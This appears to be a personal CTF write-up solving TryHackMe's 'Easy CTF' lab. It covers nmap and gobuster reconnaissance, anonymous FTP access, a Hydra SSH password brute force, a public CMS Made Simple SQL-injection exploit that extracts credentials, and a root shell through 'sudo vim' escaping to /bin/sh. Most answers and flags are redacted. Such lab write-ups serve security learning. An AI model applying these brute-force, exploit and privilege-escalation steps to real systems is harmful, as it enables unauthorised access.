Writeup: Try hack me -- 'Easy' CTF
thm writeups / tryhackme / ctf

This is a writeup for EasyCTF on TryHackMe

The basics

To make the magic happen, first, do the thing thingies that allows you to connect to the TryHackMe network, like boot up your VPN and... Is your computer on as well?

Good? Good.

Okay.

Oh, and a disclaimer: The easy answers are disclosed, but the answers where you need to put some effort into it, are redacted. With that said, I wish you happy hacking!


Tasks

#1 How many services are running under port 1000?

To answer that, let's bring out the big guns right off the bat. Nmap? Nmap.

So, let's fire it up:

nmap -sC -sV -oN nmap/initial <ip>

And we get:

Nmap 7.80 scan initiated Sun Aug 30 13:33:19 2020 as: nmap -sC -sV -oN nmap/initial <ip>
Nmap scan report for <ip>
Host is up (0.062s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ffff:<ip>
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun Aug 30 13:34:02 2020 -- 1 IP address (1 host up) scanned in 42.94 seconds

So; nmap shows us some useful ports: 21, 80, and 2222

Answer: 2




2. What is running on the higher port?

Let's see...

2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

Ssh running on port 2222? Sure, why not.

Answer: ssh




#5 What's the password?

What's the pass...? Hey, wait a minute, WAIT A MINUTE! HOLD ON! Task number 5?!? Why did you skip tasks 3 and 4?!?

I know, I know... I'm just trying to show that there's more than a single way to get access to the machine. So, I'll first show the way inside utilizing FTP, and then I'll tackle the application / intended way as well. So:



# Getting through FTP

From initial nmap scan we can find this:

21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ffff:<ip>
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status

Thus:

> FTP is open
> We can login as "ftp" (pretty much an anonymous user)

So, anything interesting here?

$ ftp <ip>
Connected to <ip>.
220 (vsFTPd 3.0.3)
Name <ip>:by7e): ftp
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Aug 17  2019 .
drwxr-xr-x    3 ftp      ftp          4096 Aug 17  2019 ..
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.

Hm... A public folder. That's expected for anonymous FTP. Is there anything in there?

ftp> cd pub
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 .
drwxr-xr-x    3 ftp      ftp          4096 Aug 17  2019 ..
-rw-r--r--    1 ftp      ftp           166 Aug 17  2019 ForMitch.txt
226 Directory send OK.

Hello, what's this? Let's download and examine the file...

ftp> get ForMitch.txt
ftp> 221 Goodbye.

$ cat ForMitch.txt
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess

So we now know two things: We have a name: Mitch, and that his password(s) suck. Intriguing. Let's bust out our beloved Hydra, plug it to the almighty rockyou dictionary, and point it to the port 2222.

$ hydra ssh://<ip>:2222 -l mitch -P /opt/rockyou.txt

Aaaaand --

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-30 14:43:13
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://<ip>:2222/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://mitch@<ip>:2222
[INFO] Successful, password authentication is supported by ssh://<ip>:2222
[2222][ssh] host: <ip>   login: mitch   password: [redacted]

We have a winner! Now what? Let's deal with this one first:



#5 What's the password?

Answer: [redacted]



Hey! You said--

I'm not done.

The other, intended way, is slightly different. Let's tackle that now.



# Getting through application

During our initial scan we find this:

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

robots.txt can often reveal useful information, but...

User-agent: *
Disallow: /

Disallow: /openemr-5_0_1_3

This time it's nothing. Zip. Nil. Zilch. 404. Folder doesn't exists. There's nothing there. Okay; Time for alternate routes - let's break our gobuster (no, I have no love for dirbuster. CLI FTW! )

Anyways --

gobuster dir -u http://<ip>/ -w /usr/share/wordlists/dirb/common.txt -x php,py

/.hta (Status: 403)
/.hta.py (Status: 403)
/.hta.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.py (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.py (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
+-----------------------+
| /simple (Status: 301) |
+-----------------------+

Simple, huh? Let's look at... Ohhh... CMS made simple? And there's a version of it in the footer, and, hm, let's see if there's some kind of expl--

$ searchsploit cms made simple
----------------------------------------------------------------------------------------
 Exploit Title
----------------------------------------------------------------------------------------
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning
+------------------------------------------+
| CMS Made Simple < 2.2.10 - SQL Injection |
+------------------------------------------+
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload
----------------------------------------------------------------------------------------

OH, HELLO!

So, a quick google about the injection should yield the correct CVE, and the tool to extract credentials:

https://www.exploit-db.com/exploits/46635

#3 What's the CVE you're using against the application?

Answer: [redacted]


Download and execution of the python code extracts proper credentials (Personal note: This exploit runs on python 2, not 3. Maybe 2to3 would work on this, but ehhh...):

$ python cmssmadesimple_xploit.py -u http://<ip>/simple

[+] Salt for password found: [redacted]
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: [redacted]

Hint: You can use basically any online password cracker out there. It's super simple.

#4 To what kind of vulnerability is the application vulnerable?

Answer: sqli



#5 What's the password?

Answer: [still redacted]



#6 Where can you login with the details obtained?

Well, we got the username and the password, along with the ssh port, let's combine that and answer the question:

Answer: ssh



#7 What's the user flag?

Aha! Now that we're in the machine we can do the cool stuff! So, let's do the cool stuff:

$ ssh mitch@<ip> -p2222
mitch@<ip>'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

$ ls
user.txt
$ cat user.txt
[redacted]

Answer: [redacted]



#8 Is there any other user in the home directory? What's its name?

$ ls /home
mitch [redacted]

Answer: [redacted]



#9 What can you leverage to spawn a privileged shell?

Hm, let's see...

find / -perm /4000

This yields nothing. HOWEVER, there's always one more card in my sleeve (I have a lot of cards, okay? I also may have a little bit too many sleeves, too.)

$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Gotcha!

Answer: Vim



And escaping vim is quite simple:

$ sudo vim

Within vim you can execute commands with :!, for example :!/bin/sh. You enter the shell and -- game over.

# cd /root
# ls
# cat root.txt
[redacted]

Which brings us to our last question:

#10 What's the root flag?

Answer: [still redacted]




That's it!

-- by7e

- by7e_